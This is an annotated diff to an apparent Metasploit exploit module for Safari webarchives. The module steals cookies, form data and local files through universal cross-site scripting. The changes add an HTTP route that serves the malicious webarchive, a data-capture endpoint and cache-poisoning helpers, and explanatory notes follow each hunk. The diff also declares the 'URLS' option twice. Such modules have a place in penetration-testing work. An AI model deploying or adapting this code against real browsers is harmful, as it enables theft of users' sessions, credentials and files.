@@ -50,6 +50,8 @@ def initialize(info = {})
        OptString.new('FILENAME', [true, 'The file name.', 'msf.webarchive']),
        OptString.new('URLS', [true, 'A space-delimited list of URLs to UXSS (e.g. http://browserscan.rapid7.com/)']),
        OptString.new('URIPATH', [false, 'The URI to receive the UXSS\'ed data', '/grab']),
+       OptString.new('DOWNLOAD_PATH', [true, 'The path to download the webarchive.', '/msf.webarchive']),
+       OptString.new('URLS', [true, 'The URLs to steal cookie and form data from.', '']),
        OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal.', '']),
        OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing.", true]),
        OptBool.new('STEAL_FILES', [true, "Enable local file stealing.", true]),
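The added options are read back at runtime through the module's `datastore`. A minimal sketch of how they would typically be consumed (the helper names here are illustrative, not necessarily the module's own):

```ruby
# Illustrative helpers only -- the module's real accessors may differ.
def urls
  # URLS is space-delimited per its description above
  datastore['URLS'].to_s.split(/\s+/).reject(&:empty?)
end

def webarchive_download_path
  datastore['DOWNLOAD_PATH'] # e.g. '/msf.webarchive'
end
```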
@@ -143,7 +145,7 @@ def start_http(opts={})
    }.update(opts['Uri'] || {})

    proto = (datastore["SSL"] ? "https" : "http")
-   print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
+   print_status("Data capture URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")

    if (opts['ServerHost'] == '0.0.0.0')
      print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
@@ -153,6 +155,20 @@ def start_http(opts={})
    @service_path = uopts['Path']
    @http_service.add_resource(uopts['Path'], uopts)

+   # Add a resource path for downloading the generated webarchive
+   uopts = {
+     'Proc' => Proc.new { |cli, req|
+       resp = Rex::Proto::Http::Response::OK.new
+       resp['Content-Type'] = 'application/x-webarchive'
+       resp.body = @xml.to_s
+       cli.send_response resp
+     },
+     'Path' => webarchive_download_url
+   }.update(opts['Uri'] || {})
+   @http_service.add_resource(webarchive_download_url, uopts)
+
+   print_status("Download URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{webarchive_download_url}")
+
    # As long as we have the http_service object, we will keep the HTTP server alive
    while @http_service
      select(nil, nil, nil, 1)
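The `'Proc'` handler means the archive is generated and served entirely from memory; nothing is written to disk. A minimal standalone sketch of the same Rex idiom (port, path, and body are made up for illustration, and this assumes Rex is loadable outside the framework):

```ruby
require 'rex'

# Sketch: serve an in-memory string via a Proc-based Rex HTTP resource.
server = Rex::Proto::Http::Server.new(8080, '0.0.0.0')
server.start
server.add_resource('/msf.webarchive', 'Proc' => Proc.new { |cli, req|
  resp = Rex::Proto::Http::Response::OK.new
  resp['Content-Type'] = 'application/x-webarchive'
  resp.body = '<plist>...</plist>' # placeholder payload
  cli.send_response(resp)
})
sleep # keep the service alive
```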
@@ -176,9 +192,10 @@ def on_request_uri(cli, request)

  # @return [String] contents of webarchive as an XML document
  def webarchive_xml
-   xml = webarchive_header
-   urls.each_with_index { |url, idx| xml << webarchive_iframe(url, idx) }
-   xml << webarchive_footer
+   return @xml unless @xml.nil? # only compute the xml once
+   @xml = webarchive_header
+   urls.each_with_index { |url, idx| @xml << webarchive_iframe(url, idx) }
+   @xml << webarchive_footer
  end

  # @return [String] the first chunk of the webarchive file, containing the WebMainResource
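Caching the result in `@xml` matters because the download handler added above reads `@xml` directly, and rebuilding the archive on every request would be wasted work. For what it's worth, Ruby's `||=` expresses the same memoization more compactly (safe here because the generated XML is always a truthy, non-empty String):

```ruby
# Equivalent memoized form of webarchive_xml using ||=.
def webarchive_xml
  @xml ||= begin
    xml = webarchive_header
    urls.each_with_index { |url, idx| xml << webarchive_iframe(url, idx) }
    xml << webarchive_footer # << returns the receiver, so the block yields the full XML
  end
end
```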
@@ -288,8 +305,9 @@ def webarchive_footer
  # NSKeyedArchiver *a = [[NSKeyedArchiver alloc] initForWritingWithMutableData:data];
  # [a encodeObject:response forKey:@"WebResourceResponse"];
  def web_response_xml(script)
-   # this is a binary plist, but im too lazy to write a real encoder.
-   # ripped this straight out of a safari webarchive save.
+   # this is a serialized NSHTTPResponse, and I'm too lazy to write a
+   # real encoder, so yay, let's use string interpolation.
+   # ripped this straight out of a webarchive save
    script['content-length'] = script[:body].length
    whitelist = %w(content-type content-length date etag
                   Last-Modified cache-control expires)
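The whitelist keeps the hand-interpolated plist minimal: only headers Safari expects inside a serialized `WebResourceResponse` get copied across. A standalone sketch of that filtering step (names taken from the surrounding diff; the module's exact implementation may differ):

```ruby
# Sketch: copy only whitelisted headers out of the script hash.
# Compare case-insensitively, since the whitelist mixes cases and
# the hash also holds non-header keys like :body.
whitelist = %w(content-type content-length date etag
               Last-Modified cache-control expires)
allowed = whitelist.map(&:downcase)
headers = script.select do |key, _value|
  key.is_a?(String) && allowed.include?(key.downcase)
end
```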
@@ -711,7 +729,7 @@ def all_script_urls(pages)
    end
  end

-  # @return [Array<Array<String>>] list of URLs for remote javascripts that are cacheable
+  # @return [Array<Array<Hash>>] list of headers returned by cacheable remote javascripts
  def find_cached_scripts
    cached_scripts = all_script_urls(urls).each_with_index.map do |urls_for_site, i|
      begin
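The corrected doc-comment reflects that `find_cached_scripts` collects the response headers of scripts that can be poisoned in the browser cache, not their URLs. As a rough illustration of deciding cacheability from headers (a hypothetical helper, not part of this commit):

```ruby
# Hypothetical: a response looks cacheable if it carries validation
# or freshness headers that the browser cache will honor.
def cacheable?(headers)
  h = Hash[headers.map { |k, v| [k.to_s.downcase, v] }]
  h.key?('etag') || h.key?('last-modified') || h.key?('expires') ||
    h['cache-control'].to_s.include?('max-age')
end
```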
@@ -780,6 +798,11 @@ def backend_url
    "#{proto}://#{myhost}#{port_str}"
  end

+  # @return [String] URL that serves the malicious webarchive
+  def webarchive_download_url
+    datastore["DOWNLOAD_PATH"]
+  end
+
  # @return [Array<String>] list of interesting file URLs to steal. Additional files can be
  # stolen via the FILE_URLS module option.
  def interesting_file_urls
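Since `DOWNLOAD_PATH` is handed straight to `add_resource`, a value set without a leading slash would register an odd resource path. A defensive variant (hypothetical hardening, not in this commit) could normalize it:

```ruby
# Hypothetical: guarantee an absolute resource path.
def webarchive_download_url
  path = datastore['DOWNLOAD_PATH'].to_s
  path.start_with?('/') ? path : "/#{path}"
end
```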